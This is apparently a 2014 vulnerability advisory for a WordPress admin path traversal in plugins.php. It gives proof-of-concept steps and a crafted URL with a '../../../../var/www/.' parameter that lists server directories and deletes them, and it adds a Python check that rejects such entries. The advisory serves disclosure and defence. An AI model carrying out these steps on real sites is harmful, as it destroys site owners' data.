######################
# Exploit Title : WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://wordpress.org
# Software Link : http://wordpress.org/wordpress-3.9.2.tar.gz
# Date : 2014-07-11
# Tested on : Mozilla Firefox / WordPress 4.0 beta 1
# Mozilla Firefox / WordPress 4.0 beta 2
# Mozilla Firefox / WordPress 4.0 beta 3
# Mozilla Firefox / WordPress 3.9.2
# Mozilla Firefox / WordPress 3.9.1
# Mozilla Firefox / WordPress 3.8
# Mozilla Firefox / WordPress 3.7
######################
# Location :
http://victim/wp-admin/plugins.php
######################
# Description :
An admin user could read directory contents or delete writable directories.
######################
# PoC Path Traversal + Directory Listing
1) Choose a plugin
2) Click on "Deactivate" and "Delete" buttons
3) Replace the plugin location in the URL with the target directory.
Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245
4) Click on "Click to view entire list of files which will be delete" link.
# PoC Path Traversal + File Deletion (WARNING!!! The directories selected will be deleted!!!)
1) Choose a plugin
2) Click on "Deactivate" and "Delete" buttons
3) Replace the plugin location in the URL with the target directory.
Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245
4) Click on "Yes delete these files"
# PoC video is available at:
https://www.youtube.com/watch?v=yVtIA82ZJuA
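A defensive containment check for the plugin entry carried in the request above, as an added example that is not part of this advisory or of WordPress's own code. It assumes a plugins directory path (PLUGINS_DIR, constructed) and models a checked[] entry as a path relative to that directory; the URL it parses is the example URL from this advisory.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumed plugins directory (constructed value, not taken from any real site).
PLUGINS_DIR = "/var/www/html/wp-content/plugins"


def resolve_plugin_path(plugins_dir, plugin_file):
    """Canonical absolute path for a plugin entry, or None if it escapes plugins_dir.

    Rejects absolute paths, NUL bytes, and any entry that after normalisation is
    not strictly inside the plugins directory (the directory itself is refused too,
    since an entry of "." would otherwise target the whole plugins tree).
    """
    if not plugin_file or posixpath.isabs(plugin_file) or "\x00" in plugin_file:
        return None
    base = posixpath.normpath(plugins_dir)
    # normpath collapses "../" segments, so traversal is resolved before the check.
    candidate = posixpath.normpath(posixpath.join(base, plugin_file))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


def checked_entries_from_url(url):
    """Return the checked[] entries of a plugins.php delete-selected request URL."""
    qs = parse_qs(urlsplit(url).query)
    if qs.get("action") != ["delete-selected"]:
        return []
    entries = []
    for key, values in qs.items():
        # Entries arrive as checked[]=..., checked[0]=..., checked[1]=... and so on.
        if key.startswith("checked[") and key.endswith("]"):
            entries.extend(values)
    return entries


def audit_delete_request(url, plugins_dir=PLUGINS_DIR):
    """Map each checked[] entry to its resolved path, or None where it must be refused."""
    return {e: resolve_plugin_path(plugins_dir, e) for e in checked_entries_from_url(url)}
```

Running audit_delete_request on the advisory's example URL yields None for the "../../../../var/www/." entry, i.e. the request would be refused before any listing or deletion takes place.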
######################
# Vulnerability Disclosure Timeline:
2014-07-10: Discovered vulnerability
2014-07-10: Vendor Notification (WordPress Security e-mail address)
2014-07-10: Vendor Response/Feedback (Andrew Nacin - Lead Developer WordPress)
2014-08-06: 3.9.2 released, but the vulnerability is not fixed
2014-08-06: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################